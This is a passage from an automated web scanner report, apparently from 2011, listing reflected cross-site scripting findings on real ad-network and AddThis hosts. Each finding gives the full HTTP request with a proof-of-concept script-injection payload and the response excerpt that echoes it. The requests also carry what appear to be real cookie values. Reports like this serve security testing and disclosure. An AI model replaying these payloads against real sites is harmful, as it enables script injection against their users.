
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/B3DM/2010DM/1377241392@x23?USNetwork/Dominos_11Q2_247_CPC_7287bcfc"-alert(1)-"38d19f0405 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11060627171@x90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242610

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:04:27 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2437
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/Dominos_11Q2_247_CPC_7287bcfc"-alert(1)-"38d19f0405";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to ch
...[SNIP]...

3.175. http://dm.de.mookie1.com/2/B3DM/2010DM/1377241392@x23 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1377241392@x23

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5bee7"-alert(1)-"d96185b3a49 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/B3DM/2010DM/1377241392@x23?USNetwork/Dominos_11Q2_247_CPC_728&5bee7"-alert(1)-"d96185b3a49=1 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11060627171@x90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242610

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:04:27 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2441
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/Dominos_11Q2_247_CPC_728&5bee7"-alert(1)-"d96185b3a49=1";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to
...[SNIP]...

3.176. http://dm.de.mookie1.com/2/B3DM/2010DM/1548248067@x23 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1548248067@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37a88"><script>alert(1)</script>4134ea3c517 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM37a88"><script>alert(1)</script>4134ea3c517/2010DM/1548248067@x23?USNetwork/Dominos_11Q2_247_CPC_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11959749775@x90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:03:45 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM37a88"><script>alert(1)</script>4134ea3c517/2010DM/818904836/x23/default/empty.gif/726348573830327254356f4142562f46?x" target="_top"><I
...[SNIP]...

3.177. http://dm.de.mookie1.com/2/B3DM/2010DM/1548248067@x23 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1548248067@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1bb87"><script>alert(1)</script>cb041db047f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM1bb87"><script>alert(1)</script>cb041db047f/1548248067@x23?USNetwork/Dominos_11Q2_247_CPC_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11959749775@x90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:03:47 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM1bb87"><script>alert(1)</script>cb041db047f/1515177406/x23/default/empty.gif/726348573830327254356f4142562f46?x" target="_top"><
...[SNIP]...

3.178. http://dm.de.mookie1.com/2/B3DM/2010DM/1548248067@x23 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1548248067@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec8df"><script>alert(1)</script>c890c99deb6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/1548248067@x23ec8df"><script>alert(1)</script>c890c99deb6?USNetwork/Dominos_11Q2_247_CPC_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11959749775@x90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:03:49 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 325
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/120922881/x23ec8df"><script>alert(1)</script>c890c99deb6/default/empty.gif/726348573830327254356f4142562f46?x" target="_top"><I
...[SNIP]...

3.179. http://dm.de.mookie1.com/2/B3DM/2010DM/1548248067@x23 [USNetwork/Dominos_11Q2_247_CPC_728 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1548248067@x23

Issue detail

The value of the USNetwork/Dominos_11Q2_247_CPC_728 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12f5f"-alert(1)-"2e2171ccfc5 was submitted in the USNetwork/Dominos_11Q2_247_CPC_728 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/B3DM/2010DM/1548248067@x23?USNetwork/Dominos_11Q2_247_CPC_72812f5f"-alert(1)-"2e2171ccfc5 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11959749775@x90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:03:44 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2438
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660;path=/;httponly

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/Dominos_11Q2_247_CPC_72812f5f"-alert(1)-"2e2171ccfc5";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to ch
...[SNIP]...

3.180. http://dm.de.mookie1.com/2/B3DM/2010DM/1548248067@x23 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1548248067@x23

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b5c1"-alert(1)-"8ce35333fa2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/B3DM/2010DM/1548248067@x23?USNetwork/Dominos_11Q2_247_CPC_728&1b5c1"-alert(1)-"8ce35333fa2=1 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11959749775@x90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:03:44 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2441
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660;path=/;httponly

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/Dominos_11Q2_247_CPC_728&1b5c1"-alert(1)-"8ce35333fa2=1";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to
...[SNIP]...

3.181. http://ds.addthis.com/red/psi/sites/www.manta.com/p.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.manta.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload e5ae4<script>alert(1)</script>e6a6ac44971 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.manta.com/p.json?callback=_ate.ad.hpre5ae4<script>alert(1)</script>e6a6ac44971&uid=4d5af32c71c2e1a5&url=http%3A%2F%2Fwww.manta.com%2Fc%2Fmtl07lp%2Findustrial-waste-recovery-llc&w1bilb HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh32.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=%7B%222%22%3A%223375925924%2CrcHW801b0RcADNFE%22%7D..1298426248.60|1297806627.66; psc=4; uid=4d5af32c71c2e1a5

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 314
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Sat, 26 Feb 2011 00:20:52 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Mon, 28 Mar 2011 00:20:52 GMT; Path=/
Set-Cookie: di=%7B%222%22%3A%223375925924%2CrcHW801b0RcADNFE%22%7D..1298679652.60|1297806627.66; Domain=.addthis.com; Expires=Sun, 24-Feb-2013 18:22:57 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sat, 26 Feb 2011 00:20:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 26 Feb 2011 00:20:52 GMT
Connection: close

_ate.ad.hpre5ae4<script>alert(1)</script>e6a6ac44971({"urls":["http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4d5af32c71c2e1a5&curl=http%3a%2f%2fwww.manta.com%2fc%2fmtl07lp%2findustrial-waste-recovery-llc"],"segments"
...[SNIP]...

3.182. http://e1.cdn.qnsr.com/cgi/k/20120772/1536/0/0/203635133/203635133//0/203/8598//1/i.js [REST URL parameter 10]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e1.cdn.qnsr.com
Path:   /cgi/k/20120772/1536/0/0/203635133/203635133//0/203/8598//1/i.js

Issue detail

The value of REST URL parameter 10 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload acc29'%3b0ddd73bd74d was submitted in the REST URL parameter 10. This input was echoed as acc29';0ddd73bd74d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cgi/k/20120772/1536/0/0/203635133/203635133//0/203acc29'%3b0ddd73bd74d/8598//1/i.js HTTP/1.1
Host: e1.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://e1.cdn.qnsr.com/cgi/d/1537/0/203/635133/549914/i0.html?;y=http%3A//blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html;s=8598;d=camp20985953~camp20993046::ch203687986ad20142038~ch203687989ad20141534~ch203687989ad20143682~ch203687989ad20140829~ch203687987ad20145841~ch203687989ad20143853~ch203687984ad20132865~ch203687988ad20138856;z=3795111825
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Vary: Accept-Encoding
Cache-Control: max-age=2591996
Expires: Mon, 28 Mar 2011 01:49:45 GMT
Date: Sat, 26 Feb 2011 01:49:49 GMT
Connection: close
Content-Length: 743


var zz_trd = "";
var zz_param = "";
var zz_ref = "";

if (typeof zzTrd != 'undefined') { zz_trd = zzTrd; }
if (typeof zzParam != 'undefined') { zz_param = zzParam + ";"; }
if (typeof zzRef != 'undefi
...[SNIP]...
<A HREF="http://o1.qnsr.com//cgi/c?a=20120772;x=1536;c=203635133,203635133;i=0;n=203acc29';0ddd73bd74d;s=8598;p=20484683;f=20484669;' + zz_param + zz_ref + zzStr + ';k=' + zz_trd + 'http://technology.search-schools.com/onestepsearch.jsp?" TARGET="_blank" onMouseOver="window.status=\'\'; return true;" o
...[SNIP]...

3.183. http://e1.cdn.qnsr.com/cgi/k/20120772/1536/0/0/203635133/203635133//0/203/8598//1/i.js [REST URL parameter 11]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e1.cdn.qnsr.com
Path:   /cgi/k/20120772/1536/0/0/203635133/203635133//0/203/8598//1/i.js

Issue detail

The value of REST URL parameter 11 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88920'%3b539f91e0bd9 was submitted in the REST URL parameter 11. This input was echoed as 88920';539f91e0bd9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cgi/k/20120772/1536/0/0/203635133/203635133//0/203/859888920'%3b539f91e0bd9//1/i.js HTTP/1.1
Host: e1.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://e1.cdn.qnsr.com/cgi/d/1537/0/203/635133/549914/i0.html?;y=http%3A//blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html;s=8598;d=camp20985953~camp20993046::ch203687986ad20142038~ch203687989ad20141534~ch203687989ad20143682~ch203687989ad20140829~ch203687987ad20145841~ch203687989ad20143853~ch203687984ad20132865~ch203687988ad20138856;z=3795111825
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Vary: Accept-Encoding
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:53 GMT
Date: Sat, 26 Feb 2011 01:49:53 GMT
Connection: close
Content-Length: 743


var zz_trd = "";
var zz_param = "";
var zz_ref = "";

if (typeof zzTrd != 'undefined') { zz_trd = zzTrd; }
if (typeof zzParam != 'undefined') { zz_param = zzParam + ";"; }
if (typeof zzRef != 'undefi
...[SNIP]...
<A HREF="http://o1.qnsr.com//cgi/c?a=20120772;x=1536;c=203635133,203635133;i=0;n=203;s=859888920';539f91e0bd9;p=20484683;f=20484669;' + zz_param + zz_ref + zzStr + ';k=' + zz_trd + 'http://technology.search-schools.com/onestepsearch.jsp?" TARGET="_blank" onMouseOver="window.status=\'\'; return true;" onMouseO
...[SNIP]...

3.184. http://e1.cdn.qnsr.com/cgi/k/20120772/1536/0/0/203635133/203635133//0/203/8598//1/i.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e1.cdn.qnsr.com
Path:   /cgi/k/20120772/1536/0/0/203635133/203635133//0/203/8598//1/i.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4693'%3b652b91c5004 was submitted in the REST URL parameter 4. This input was echoed as d4693';652b91c5004 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cgi/k/20120772/1536d4693'%3b652b91c5004/0/0/203635133/203635133//0/203/8598//1/i.js HTTP/1.1
Host: e1.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://e1.cdn.qnsr.com/cgi/d/1537/0/203/635133/549914/i0.html?;y=http%3A//blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html;s=8598;d=camp20985953~camp20993046::ch203687986ad20142038~ch203687989ad20141534~ch203687989ad20143682~ch203687989ad20140829~ch203687987ad20145841~ch203687989ad20143853~ch203687984ad20132865~ch203687988ad20138856;z=3795111825
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Vary: Accept-Encoding
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:32 GMT
Date: Sat, 26 Feb 2011 01:49:32 GMT
Connection: close
Content-Length: 743


var zz_trd = "";
var zz_param = "";
var zz_ref = "";

if (typeof zzTrd != 'undefined') { zz_trd = zzTrd; }
if (typeof zzParam != 'undefined') { zz_param = zzParam + ";"; }
if (typeof zzRef != 'undefi
...[SNIP]...
<A HREF="http://o1.qnsr.com//cgi/c?a=20120772;x=1536d4693';652b91c5004;c=203635133,203635133;i=0;n=203;s=8598;p=20484683;f=20484669;' + zz_param + zz_ref + zzStr + ';k=' + zz_trd + 'http://technology.search-schools.com/onestepsearch.jsp?" TARGET="_blank" onMouseOver="win
...[SNIP]...

3.185. http://e1.cdn.qnsr.com/cgi/k/20120772/1536/0/0/203635133/203635133//0/203/8598//1/i.js [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e1.cdn.qnsr.com
Path:   /cgi/k/20120772/1536/0/0/203635133/203635133//0/203/8598//1/i.js

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c75eb'%3b9d193661b16 was submitted in the REST URL parameter 7. This input was echoed as c75eb';9d193661b16 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cgi/k/20120772/1536/0/0/203635133c75eb'%3b9d193661b16/203635133//0/203/8598//1/i.js HTTP/1.1
Host: e1.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://e1.cdn.qnsr.com/cgi/d/1537/0/203/635133/549914/i0.html?;y=http%3A//blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html;s=8598;d=camp20985953~camp20993046::ch203687986ad20142038~ch203687989ad20141534~ch203687989ad20143682~ch203687989ad20140829~ch203687987ad20145841~ch203687989ad20143853~ch203687984ad20132865~ch203687988ad20138856;z=3795111825
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
